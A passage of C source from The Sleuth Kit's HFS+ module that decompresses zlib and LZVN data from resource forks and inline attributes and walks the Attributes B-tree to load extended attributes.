error_detected(TSK_ERR_FS_ARG,
"%s: called with non-special attribute: %x",
__func__, a_fs_attr->flags);
return -1;
}
// Check that the ATTR being read is the main DATA resource, 4352-0,
// because this is the only one that can be compressed in HFS+
if ((a_fs_attr->id != HFS_FS_ATTR_ID_DATA) ||
(a_fs_attr->type != TSK_FS_ATTR_TYPE_HFS_DATA)) {
error_detected(TSK_ERR_FS_ARG,
"%s: arg specified an attribute %u-%u that is not the data fork, "
"Only the data fork can be compressed.", __func__,
a_fs_attr->type, a_fs_attr->id);
return -1;
}
/******** Open the Resource Fork ***********/
// The file
fs_file = a_fs_attr->fs_file;
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
(" %s: could not get the attribute for the resource fork of the file", __func__);
return -1;
}
// read the offset table from the fork header
if (!read_block_table(rAttr, &offsetTable, &offsetTableSize, &offsetTableOffset)) {
return -1;
}
// Compute the range of compression units needed for the request
startUnit = a_offset / COMPRESSION_UNIT_SIZE;
startUnitOffset = a_offset % COMPRESSION_UNIT_SIZE;
endUnit = (a_offset + a_len - 1) / COMPRESSION_UNIT_SIZE;
if (startUnit >= offsetTableSize || endUnit >= offsetTableSize) {
error_detected(TSK_ERR_FS_ARG,
"%s: range of bytes requested %lld - %lld falls past the "
"end of the uncompressed stream %llu\n",
__func__, a_offset, a_offset + a_len,
offsetTable[offsetTableSize-1].offset +
offsetTable[offsetTableSize-1].length);
goto on_error;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: reading compression units: %" PRIu32
" to %" PRIu32 "\n", __func__, startUnit, endUnit);
bytesCopied = 0;
// Allocate buffers for the raw and uncompressed data
/* Raw data can be COMPRESSION_UNIT_SIZE+1 if the zlib data is not
* compressed and there is a 1-byte flag that indicates that
* the data is not compressed. */
rawBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE + 1);
if (rawBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
uncBuf = (char *) tsk_malloc(COMPRESSION_UNIT_SIZE);
if (uncBuf == NULL) {
error_returned
(" %s: buffers for reading and uncompressing", __func__);
goto on_error;
}
// Read from the indicated comp units
for (indx = startUnit; indx <= endUnit; ++indx) {
uint64_t uncLen;
char *uncBufPtr = uncBuf;
size_t bytesToCopy;
switch ((uncLen = read_and_decompress_block(
rAttr, rawBuf, uncBuf,
offsetTable, offsetTableSize, offsetTableOffset, indx,
decompress_block)))
{
case -1:
goto on_error;
case 0:
continue;
default:
break;
}
// If this is the first comp unit, then we must skip over the
// startUnitOffset bytes.
if (indx == startUnit) {
uncLen -= startUnitOffset;
uncBufPtr += startUnitOffset;
}
// How many bytes to copy from this compression unit?
if (bytesCopied + uncLen < (uint64_t) a_len) // cast OK because a_len > 0
bytesToCopy = (size_t) uncLen; // uncLen <= size of compression unit, which is small, so cast is OK
else
bytesToCopy = (size_t) (((uint64_t) a_len) - bytesCopied); // diff <= compression unit size, so cast is OK
// Copy into the output buffer, and update bookkeeping.
memcpy(a_buf + bytesCopied, uncBufPtr, bytesToCopy);
bytesCopied += bytesToCopy;
}
// Well, we don't know (without a lot of work) what the
// true uncompressed size of the stream is. All we know is the "upper bound" which
// assumes that all of the compression units expand to their full size. If we did
// know the true size, then we could reject requests that go beyond the end of the
// stream. Instead, we treat the stream as if it is padded out to the full size of
// the last compression unit with zeros.
// Have we read and copied all of the bytes requested?
if (bytesCopied < a_len) {
// set the remaining bytes to zero
memset(a_buf + bytesCopied, 0, a_len - (size_t) bytesCopied); // cast OK because diff must be < compression unit size
}
free(offsetTable);
free(rawBuf);
free(uncBuf);
return (ssize_t) bytesCopied; // cast OK, cannot be greater than a_len which cannot be greater than SIZE_MAX/2 (rounded down).
on_error:
free(offsetTable);
free(rawBuf);
free(uncBuf);
return -1;
}
#ifdef HAVE_LIBZ
static ssize_t
hfs_file_read_zlib_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len)
{
return hfs_file_read_compressed_rsrc(
a_fs_attr, a_offset, a_buf, a_len,
hfs_read_zlib_block_table,
hfs_decompress_zlib_block
);
}
#endif
static ssize_t
hfs_file_read_lzvn_rsrc(const TSK_FS_ATTR * a_fs_attr,
TSK_OFF_T a_offset, char *a_buf, size_t a_len)
{
return hfs_file_read_compressed_rsrc(
a_fs_attr, a_offset, a_buf, a_len,
hfs_read_lzvn_block_table,
hfs_decompress_lzvn_block
);
}
static int hfs_decompress_noncompressed_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree) {
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Leading byte, 0x%02x, indicates that the data is not really compressed.\n"
"%s: Loading the default DATA attribute.", __func__, rawBuf[0], __func__);
*dstBuf = rawBuf + 1; // + 1 indicator byte
*dstSize = uncSize;
*dstBufFree = FALSE;
return 1;
}
static int hfs_decompress_zlib_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree)
{
if ((rawBuf[0] & 0x0F) == 0x0F) {
return hfs_decompress_noncompressed_attr(
rawBuf, rawSize, uncSize, dstBuf, dstSize, dstBufFree);
}
else {
#ifdef HAVE_LIBZ
char* uncBuf = NULL;
uint64_t uLen;
unsigned long bytesConsumed;
int infResult;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Uncompressing (inflating) data.", __func__);
// Uncompress the remainder of the attribute, and load as 128-0
// Note: cast is OK because uncSize will be quite modest, < 4000.
uncBuf = (char *) tsk_malloc((size_t) uncSize + 100); // add some extra space
if (uncBuf == NULL) {
error_returned
(" - %s, space for the uncompressed attr", __func__);
return 0;
}
infResult = zlib_inflate(rawBuf, (uint64_t) rawSize,
uncBuf, (uint64_t) (uncSize + 100),
&uLen, &bytesConsumed);
if (infResult != 0) {
error_returned
(" %s, zlib could not uncompress attr", __func__);
free(uncBuf);
return 0;
}
if (bytesConsumed != rawSize) {
error_detected(TSK_ERR_FS_READ,
" %s, decompressor did not consume the whole compressed data",
__func__);
free(uncBuf);
return 0;
}
*dstBuf = uncBuf;
*dstSize = uncSize;
*dstBufFree = TRUE;
#else
// ZLIB compression library is not available, so we will load a
// zero-length default DATA attribute. Without this, icat may
// misbehave.
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: ZLIB not available, so loading an empty default DATA attribute.\n", __func__);
// Dummy is one byte long, so the ptr is not null, but we set the
// length to zero bytes, so it is never read.
static uint8_t dummy[1];
*dstBuf = dummy;
*dstSize = 0;
*dstBufFree = FALSE;
#endif
}
return 1;
}
static int hfs_decompress_lzvn_attr(char* rawBuf, uint32_t rawSize, uint64_t uncSize, char** dstBuf, uint64_t* dstSize, int* dstBufFree)
{
if (rawBuf[0] == 0x06) {
return hfs_decompress_noncompressed_attr(
rawBuf, rawSize, uncSize, dstBuf, dstSize, dstBufFree);
}
char* uncBuf = (char *) tsk_malloc((size_t) uncSize);
*dstSize = lzvn_decode_buffer(uncBuf, uncSize, rawBuf, rawSize);
*dstBuf = uncBuf;
*dstBufFree = TRUE;
return 1;
}
static int
hfs_file_read_compressed_attr(TSK_FS_FILE* fs_file,
uint8_t cmpType,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize,
int (*decompress_attr)(char* rawBuf,
uint32_t rawSize,
uint64_t uncSize,
char** dstBuf,
uint64_t* dstSize,
int* dstBufFree))
{
// Data is inline. We will load the uncompressed data as a
// resident attribute.
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Compressed data is inline in the attribute, will load this as the default DATA attribute.\n", __func__);
if (attributeLength <= 16) {
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: WARNING, Compression Record of type %u is not followed by"
" compressed data. No data will be loaded into the DATA"
" attribute.\n", __func__, cmpType);
// oddly, this is not actually considered an error
return 1;
}
TSK_FS_ATTR *fs_attr_unc;
// There is data following the compression record, as there should be.
if ((fs_attr_unc = tsk_fs_attrlist_getnew(
fs_file->meta->attr, TSK_FS_ATTR_RES)) == NULL)
{
error_returned(" - %s, FS_ATTR for uncompressed data", __func__);
return 0;
}
char* dstBuf;
uint64_t dstSize;
int dstBufFree = FALSE;
if (!decompress_attr(buffer + 16, attributeLength - 16, uncSize,
&dstBuf, &dstSize, &dstBufFree)) {
return 0;
}
if (dstSize != uncSize) {
error_detected(TSK_ERR_FS_READ,
" %s, actual uncompressed size not equal to the size in the compression record", __func__);
goto on_error;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Loading decompressed data as default DATA attribute.",
__func__);
// Load the remainder of the attribute as 128-0
// set the details in the fs_attr structure.
// Note, we are loading this as a RESIDENT attribute.
if (tsk_fs_attr_set_str(fs_file,
fs_attr_unc, "DATA",
TSK_FS_ATTR_TYPE_HFS_DATA,
HFS_FS_ATTR_ID_DATA, dstBuf,
dstSize))
{
error_returned(" - %s", __func__);
goto on_error;
}
if (dstBufFree) {
free(dstBuf);
}
return 1;
on_error:
if (dstBufFree) {
free(dstBuf);
}
return 0;
}
static int hfs_file_read_zlib_attr(TSK_FS_FILE* fs_file,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize)
{
return hfs_file_read_compressed_attr(
fs_file, DECMPFS_TYPE_ZLIB_ATTR,
buffer, attributeLength, uncSize,
hfs_decompress_zlib_attr
);
}
static int hfs_file_read_lzvn_attr(TSK_FS_FILE* fs_file,
char* buffer,
uint32_t attributeLength,
uint64_t uncSize)
{
return hfs_file_read_compressed_attr(
fs_file, DECMPFS_TYPE_LZVN_ATTR,
buffer, attributeLength, uncSize,
hfs_decompress_lzvn_attr
);
}
typedef struct {
TSK_FS_INFO *fs; // the HFS file system
TSK_FS_FILE *file; // the Attributes file, if open
hfs_btree_header_record *header; // the Attributes btree header record.
// For Convenience, unpacked values.
TSK_ENDIAN_ENUM endian;
uint32_t rootNode;
uint16_t nodeSize;
uint16_t maxKeyLen;
} ATTR_FILE_T;
/** \internal
* Open the Attributes file, and read the btree header record. Fill in the fields of the ATTR_FILE_T struct.
*
* @param fs -- the HFS file system
* @param header -- the header record struct
*
* @return 1 on error, 0 on success
*/
static uint8_t
open_attr_file(TSK_FS_INFO * fs, ATTR_FILE_T * attr_file)
{
int cnt; // will hold bytes read
hfs_btree_header_record *hrec;
// clean up any error messages that are lying around
tsk_error_reset();
if (fs == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("open_attr_file: fs is NULL");
return 1;
}
if (attr_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("open_attr_file: attr_file is NULL");
return 1;
}
// Open the Attributes File
attr_file->file =
tsk_fs_file_open_meta(fs, NULL, HFS_ATTRIBUTES_FILE_ID);
if (attr_file->file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr
("open_attr_file: could not open the Attributes file");
return 1;
}
// Allocate some space for the Attributes btree header record (which
// is passed back to the caller)
hrec = (hfs_btree_header_record *)
malloc(sizeof(hfs_btree_header_record));
if (hrec == NULL) {
tsk_error_set_errno(TSK_ERR_FS);
tsk_error_set_errstr
("open_attr_file: could not malloc space for Attributes header record");
return 1;
}
// Read the btree header record
cnt = tsk_fs_file_read(attr_file->file,
14,
(char *) hrec,
sizeof(hfs_btree_header_record), (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != sizeof(hfs_btree_header_record)) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr
("open_attr_file: could not open the Attributes file");
tsk_fs_file_close(attr_file->file);
free(hrec);
return 1;
}
// Fill in the fields of the attr_file struct (which was passed in by the caller)
attr_file->fs = fs;
attr_file->header = hrec;
attr_file->endian = fs->endian;
attr_file->nodeSize = tsk_getu16(attr_file->endian, hrec->nodesize);
attr_file->rootNode = tsk_getu32(attr_file->endian, hrec->rootNode);
attr_file->maxKeyLen = tsk_getu16(attr_file->endian, hrec->maxKeyLen);
return 0;
}
/** \internal
* Closes and frees the data structures associated with ATTR_FILE_T
*/
static uint8_t
close_attr_file(ATTR_FILE_T * attr_file)
{
if (attr_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_READ);
tsk_error_set_errstr("close_attr_file: NULL attr_file arg");
return 1;
}
if (attr_file->file != NULL) {
tsk_fs_file_close(attr_file->file);
attr_file->file = NULL;
}
if (attr_file->header != NULL) {
free(attr_file->header);
attr_file->header = NULL;
}
attr_file->rootNode = 0;
attr_file->nodeSize = 0;
// Note that we leave the fs component alone.
return 0;
}
static const char *
hfs_attrTypeName(uint32_t typeNum)
{
switch (typeNum) {
case TSK_FS_ATTR_TYPE_HFS_DEFAULT:
return "DFLT";
case TSK_FS_ATTR_TYPE_HFS_DATA:
return "DATA";
case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR:
return "ExATTR";
case TSK_FS_ATTR_TYPE_HFS_COMP_REC:
return "CMPF";
case TSK_FS_ATTR_TYPE_HFS_RSRC:
return "RSRC";
default:
return "UNKN";
}
}
// TODO: Function description missing here no idea what it is supposed to return
// in which circumstances.
static uint8_t
hfs_load_extended_attrs(TSK_FS_FILE * fs_file,
unsigned char *isCompressed, unsigned char *cmpType,
uint64_t *uncompressedSize)
{
TSK_FS_INFO *fs = fs_file->fs_info;
uint64_t fileID;
ATTR_FILE_T attrFile;
int cnt; // count of chars read from file.
uint8_t *nodeData;
TSK_ENDIAN_ENUM endian;
hfs_btree_node *nodeDescriptor; // The node descriptor
uint32_t nodeID; // The number or ID of the Attributes file node to read.
hfs_btree_key_attr *keyB; // ptr to the key of the Attr file record.
unsigned char done; // Flag to indicate that we are done looping over leaf nodes
uint16_t attribute_counter = 2; // The ID of the next attribute to be loaded.
HFS_INFO *hfs;
char *buffer = NULL; // buffer to hold the attribute
TSK_LIST *nodeIDs_processed = NULL; // Keep track of node IDs to prevent an infinite loop
tsk_error_reset();
// The CNID (or inode number) of the file
// Note that in TSK such numbers are 64 bits, but in HFS+ they are only 32 bits.
fileID = fs_file->meta->addr;
if (fs == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_load_extended_attrs: NULL fs arg");
return 1;
}
hfs = (HFS_INFO *) fs;
if (!hfs->has_attributes_file) {
// No attributes file, and so, no extended attributes
return 0;
}
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Processing file %" PRIuINUM "\n",
fileID);
}
// Open the Attributes File
if (open_attr_file(fs, &attrFile)) {
error_returned
("hfs_load_extended_attrs: could not open Attributes file");
return 1;
}
// Is the Attributes file empty?
if (attrFile.rootNode == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Attributes file is empty\n");
close_attr_file(&attrFile);
*isCompressed = FALSE;
*cmpType = 0;
return 0;
}
// A place to hold one node worth of data
nodeData = (uint8_t *) malloc(attrFile.nodeSize);
if (nodeData == NULL) {
error_detected(TSK_ERR_AUX_MALLOC,
"hfs_load_extended_attrs: Could not malloc space for an Attributes file node");
goto on_error;
}
// Initialize these
*isCompressed = FALSE;
*cmpType = 0;
endian = attrFile.fs->endian;
// Start with the root node
nodeID = attrFile.rootNode;
// While loop, over nodes in path from root node to the correct LEAF node.
while (1) {
uint16_t numRec; // Number of records in the node
int recIndx; // index for looping over records
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Reading Attributes File node with ID %"
PRIu32 "\n", nodeID);
}
/* Make sure we do not get into an infinite loop */
if (tsk_list_find(nodeIDs_processed, nodeID)) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Infinite loop detected - trying to read node %" PRIu32 " which has already been processed", nodeID);
goto on_error;
}
/* Read the node */
cnt = tsk_fs_file_read(attrFile.file,
(TSK_OFF_T)nodeID * attrFile.nodeSize,
(char *) nodeData,
attrFile.nodeSize, (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != attrFile.nodeSize) {
error_returned
("hfs_load_extended_attrs: Could not read in a node from the Attributes File");
goto on_error;
}
/* Save this node ID to the list of processed nodes */
if (tsk_list_add(&nodeIDs_processed, nodeID)) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Could not save nodeID to the list of processed nodes");
goto on_error;
}
/** Node has a:
* Descriptor
* Set of records
* Table at the end with pointers to the records
*/
// Parse the Node header
nodeDescriptor = (hfs_btree_node *) nodeData;
// If we are at a leaf node, then we have found the right node
if (nodeDescriptor->type == HFS_ATTR_NODE_LEAF) {
break;
}
// This had better be an INDEX node, if not its an error
else if (nodeDescriptor->type != HFS_ATTR_NODE_INDEX) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Reached a non-INDEX and non-LEAF node in searching the Attributes File");
goto on_error;
}
// OK, we are in an INDEX node. loop over the records to find the last one whose key is
// smaller than or equal to the desired key
numRec = tsk_getu16(endian, nodeDescriptor->num_rec);
if (numRec == 0) {
// This is wrong, there must always be at least 1 record in an INDEX node.
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs:Attributes File index node %"
PRIu32 " has zero records", nodeID);
goto on_error;
}
for (recIndx = 0; recIndx < numRec; ++recIndx) {
uint16_t keyLength;
int comp; // comparison result
char *compStr; // comparison result, as a string
uint8_t *recData; // pointer to the data part of the record
uint32_t keyFileID;
// The offset to the record is stored in table at end of node
uint8_t *recOffsetTblEntry = &nodeData[attrFile.nodeSize - (2 * (recIndx + 1))]; // data describing where this record is
uint16_t recOffset = tsk_getu16(endian, recOffsetTblEntry);
//uint8_t * nextRecOffsetData = &nodeData[attrFile.nodeSize - 2* (recIndx+2)];
// make sure the record and first fields are in the buffer
if (recOffset + 14 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute (offset too big)");
goto on_error;
}
// Pointer to first byte of record
uint8_t *recordBytes = &nodeData[recOffset];
// Cast that to the Attributes file key (n.b., the key is the first thing in the record)
keyB = (hfs_btree_key_attr *) recordBytes;
// Is this key less than what we are seeking?
//int comp = comp_attr_key(endian, keyB, fileID, attrName, startBlock);
keyFileID = tsk_getu32(endian, keyB->file_id);
if (keyFileID < fileID) {
comp = -1;
compStr = "less than";
}
else if (keyFileID > fileID) {
comp = 1;
compStr = "greater than";
}
else {
comp = 0;
compStr = "equal to";
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: INDEX record %d, fileID %"
PRIu32 " is %s the file ID we are seeking, %" PRIu32
".\n", recIndx, keyFileID, compStr, fileID);
if (comp > 0) {
// The key of this record is greater than what we are seeking
if (recIndx == 0) {
// This is the first record, so no records are appropriate
// Nothing in this btree will match. We can stop right here.
goto on_exit;
}
// This is not the first record, so, the previous record's child is the one we want.
break;
}
// CASE: key in this record matches the key we are seeking. The previous record's child
// is the one we want. However, if this is the first record, then we want THIS record's child.
if (comp == 0 && recIndx != 0) {
break;
}
// Extract the child node ID from the record data (stored after the key)
keyLength = tsk_getu16(endian, keyB->key_len);
// make sure the fields we care about are still in the buffer
// +2 is because key_len doesn't include its own length
// +4 is because of the amount of data we read from the data
if (recOffset + keyLength + 2 + 4 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
recData = &recordBytes[keyLength + 2];
// Data must start on an even offset from the beginning of the record.
// So, correct this if needed.
if ((recData - recordBytes) % 2) {
recData += 1;
}
// The next four bytes should be the Node ID of the child of this node.
nodeID = tsk_getu32(endian, recData);
// At this point, either comp<0 or comp=0 && recIndx=0. In the latter case we want to
// descend to the child of this node, so we break.
if (recIndx == 0 && comp == 0) {
break;
}
// CASE: key in this record is less than key we seek. comp < 0
// So, continue looping over records in this node.
} // END loop over records
} // END while loop over Nodes in path from root to LEAF node
// At this point nodeData holds the contents of a LEAF node with the right range of keys
// and nodeDescriptor points to the descriptor of that node.
// Loop over successive LEAF nodes, starting with this one
done = FALSE;
while (!done) {
uint16_t numRec; // number of records
unsigned int recIndx; // index for looping over records
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Attributes File LEAF Node %"
PRIu32 ".\n", nodeID);
numRec = tsk_getu16(endian, nodeDescriptor->num_rec);
// Note, leaf node could have one (or maybe zero) records
// Loop over the records in this node
for (recIndx = 0; recIndx < numRec; ++recIndx) {
// The offset to the record is stored in table at end of node
uint8_t *recOffsetTblEntry = &nodeData[attrFile.nodeSize - (2 * (recIndx + 1))]; // data describing where this record is
uint16_t recOffset = tsk_getu16(endian, recOffsetTblEntry);
int comp; // comparison result
char *compStr; // comparison result as a string
uint32_t keyFileID;
// make sure the record and first fields are in the buffer
if (recOffset + 14 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute (offset too big)");
goto on_error;
}
// Pointer to first byte of record
uint8_t *recordBytes = &nodeData[recOffset];
// Cast that to the Attributes file key
keyB = (hfs_btree_key_attr *) recordBytes;
// Compare recordBytes key to the key that we are seeking
keyFileID = tsk_getu32(endian, keyB->file_id);
//fprintf(stdout, " Key file ID = %lu\n", keyFileID);
if (keyFileID < fileID) {
comp = -1;
compStr = "less than";
}
else if (keyFileID > fileID) {
comp = 1;
compStr = "greater than";
}
else {
comp = 0;
compStr = "equal to";
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: LEAF Record key file ID %"
PRIu32 " is %s the desired file ID %" PRIu32 "\n",
keyFileID, compStr, fileID);
// Are they the same?
if (comp == 0) {
// Yes, so load this attribute
uint8_t *recData; // pointer to the data part of the recordBytes
hfs_attr_data *attrData;
uint32_t attributeLength;
uint32_t nameLength;
uint32_t recordType;
uint16_t keyLength;
int conversionResult;
char nameBuff[HFS_MAX_ATTR_NAME_LEN_UTF8_B+1];
TSK_FS_ATTR_TYPE_ENUM attrType;
TSK_FS_ATTR *fs_attr; // Points to the attribute to be loaded.
keyLength = tsk_getu16(endian, keyB->key_len);
// make sure the fields we care about are still in the buffer
// +2 because key_len doesn't include its own length
// +16 for the amount of data we'll read from data
if (recOffset + keyLength + 2 + 16 > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
recData = &recordBytes[keyLength + 2];
// Data must start on an even offset from the beginning of the record.
// So, correct this if needed.
if ((recData - recordBytes) % 2) {
recData += 1;
}
attrData = (hfs_attr_data *) recData;
// Check we can process the record type before allocating memory
recordType = tsk_getu32(endian, attrData->record_type);
if (recordType != HFS_ATTR_RECORD_INLINE_DATA) {
error_detected(TSK_ERR_FS_UNSUPTYPE,
"hfs_load_extended_attrs: Unsupported record type: (%d)",
recordType);
goto on_error;
}
// This is the length of the useful data, not including the record header
attributeLength = tsk_getu32(endian, attrData->attr_size);
// Check the attribute fits in the node
//if (recordType != HFS_ATTR_RECORD_INLINE_DATA) {
if (recOffset + keyLength + 2 + attributeLength > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
// attr_name_len is in UTF_16 chars
nameLength = tsk_getu16(endian, keyB->attr_name_len);
if (2*nameLength > HFS_MAX_ATTR_NAME_LEN_UTF16_B) {
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_load_extended_attrs: Name length (%d) is too long.",
nameLength);
goto on_error;
}
buffer = tsk_malloc(attributeLength);
if (buffer == NULL) {
error_detected(TSK_ERR_AUX_MALLOC,
"hfs_load_extended_attrs: Could not malloc space for the attribute.");
goto on_error;
}
memcpy(buffer, attrData->attr_data, attributeLength);
// Use the "attr_name" part of the key as the attribute name
// but must convert to UTF8. Unfortunately, there does not seem to
// be any easy way to determine how long the converted string will
// be because UTF8 is a variable length encoding. However, the longest
// it will be is 3 * the max number of UTF16 code units. Add one for null
// termination. (thanks Judson!)
conversionResult = hfs_UTF16toUTF8(fs, keyB->attr_name,
nameLength, nameBuff, HFS_MAX_ATTR_NAME_LEN_UTF8_B+1, 0);
if (conversionResult != 0) {
error_returned
("-- hfs_load_extended_attrs could not convert the attr_name in the btree key into a UTF8 attribute name");
goto on_error;
}
// What is the type of this attribute? If it is a compression record, then
// use TSK_FS_ATTR_TYPE_HFS_COMP_REC. Else, use TSK_FS_ATTR_TYPE_HFS_EXT_ATTR
// Only "inline data" kind of record is handled.
if (strcmp(nameBuff, "com.apple.decmpfs") == 0 &&
tsk_getu32(endian, attrData->record_type) == HFS_ATTR_RECORD_INLINE_DATA) {
// Now, look at the compression record
DECMPFS_DISK_HEADER *cmph = (DECMPFS_DISK_HEADER *) buffer;
*cmpType =
tsk_getu32(TSK_LIT_ENDIAN, cmph->compression_type);
uint64_t uncSize = tsk_getu64(TSK_LIT_ENDIAN,
cmph->uncompressed_size);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: This attribute is a compression record.\n");
attrType = TSK_FS_ATTR_TYPE_HFS_COMP_REC;
*isCompressed = TRUE; // The data is governed by a compression record (but might not be compressed)
*uncompressedSize = uncSize;
switch (*cmpType) {
// Data is inline. We will load the uncompressed
// data as a resident attribute.
case DECMPFS_TYPE_ZLIB_ATTR:
if (!hfs_file_read_zlib_attr(
fs_file, buffer, attributeLength, uncSize))
{
goto on_error;
}
break;
case DECMPFS_TYPE_LZVN_ATTR:
if (!hfs_file_read_lzvn_attr(
fs_file, buffer, attributeLength, uncSize))
{
goto on_error;
}
break;
// Data is compressed in the resource fork
case DECMPFS_TYPE_ZLIB_RSRC:
case DECMPFS_TYPE_LZVN_RSRC:
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Compressed data is in the file Resource Fork.\n", __func__);
break;
}
}
else { // Attrbute name is NOT com.apple.decmpfs
attrType = TSK_FS_ATTR_TYPE_HFS_EXT_ATTR;
} // END if attribute name is com.apple.decmpfs ELSE clause
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_RES)) == NULL) {
error_returned(" - hfs_load_extended_attrs");
goto on_error;
}
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: loading attribute %s, type %u (%s)\n",
nameBuff, (uint32_t) attrType,
hfs_attrTypeName((uint32_t) attrType));
}
// set the details in the fs_attr structure
if (tsk_fs_attr_set_str(fs_file, fs_attr, nameBuff,
attrType, attribute_counter, buffer,
attributeLength)) {
error_returned(" - hfs_load_extended_attrs");
goto on_error;
}
free(buffer);
buffer = NULL;
++attribute_counter;
} // END if comp == 0
if (comp == 1) {
// since this record key is greater than our search key, all
// subsequent records will also be greater.
done = TRUE;
break;
}
} // END loop over records in one LEAF node
/*
* We get to this point if either:
*
* 1. We finish the loop over records and we are still loading attributes
* for the given file. In this case we are NOT done, and must read in
* the next leaf node, and process its records. The following code
* loads the next leaf node before we return to the top of the loop.
*
* 2. We "broke" out of the loop over records because we found a key that
* whose file ID is greater than the one we are working on. In that case
* we are done. The following code does not run, and we exit the
* while loop over successive leaf nodes.
*/
if (!done) {
// We did not finish loading the attributes when we got to the end of that node,
// so we must get the next node, and continue.
// First determine the nodeID of the next LEAF node
uint32_t newNodeID = tsk_getu32(endian, nodeDescriptor->flink);
//fprintf(stdout, "Next Node ID = %u\n", newNodeID);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Processed last record of THIS node, still gathering attributes.\n");
// If we are at the very last leaf node in the btree, then
// this "flink" will be zero. We break out of this loop over LEAF nodes.
if (newNodeID == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: But, there are no more leaf nodes, so we are done.\n");
break;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Reading the next LEAF node %"
PRIu32 ".\n", nodeID);
nodeID = newNodeID;
cnt = tsk_fs_file_read(attrFile.file,
nodeID * attrFile.nodeSize,
(char *) nodeData,
attrFile.nodeSize, (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != attrFile.nodeSize) {
error_returned
("hfs_load_extended_attrs: Could not read in the next LEAF node from the Attributes File btree");
goto on_error;
}
// Parse the Node header
nodeDescriptor = (hfs_btree_node *) nodeData;
// If we are NOT leaf node, then this is an error
if (nodeDescriptor->type != HFS_ATTR_NODE_LEAF) {
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_load_extended_attrs: found a non-LEAF node as a successor to a LEAF node");
goto on_error;
}
} // END if(! done)
} // END while(! done) loop over successive LEAF nodes
on_exit:
free(nodeData);
tsk_list_free(nodeIDs_processed);
close_attr_file(&attrFile);
return 0;
on_error:
if (buffer != NULL) {
free(buffer);
}
if (nodeData != NULL) {
free(nodeData);
}
tsk_list_free(nodeIDs_processed);
close_attr_file(&attrFile);
return 1;
}
typedef struct RES_DESCRIPTOR {
char type[5]; // type is really 4 chars, but we will null-terminate
uint16_t id;
uint32_t offset;
uint32_t length;
char *name; // NULL if a name is not defined for this resource
struct RES_DESCRIPTOR *next;
} RES_DESCRIPTOR;
void
free_res_descriptor(RES_DESCRIPTOR * rd)
{
RES_DESCRIPTOR *nxt;
if (rd == NULL)
return;
nxt = rd->next;
if (rd->name != NULL)
free(rd->name);
free(rd);
free_res_descriptor(nxt); // tail recursive
}
/**
* The purpose of this function is to parse the resource fork of a file, and to return
* a data structure that is, in effect, a table of contents for the resource fork. The
* data structure is a null-terminated linked list of entries. Each one describes one
* resource. If the resource fork is empty, or if there is not a resource fork at all,
* or an error occurs, this function returns NULL.
*
* A non-NULL answer should be freed by the caller, using free_res_descriptor.
*
*/
static RES_DESCRIPTOR *
hfs_parse_resource_fork(TSK_FS_FILE * fs_file)
{
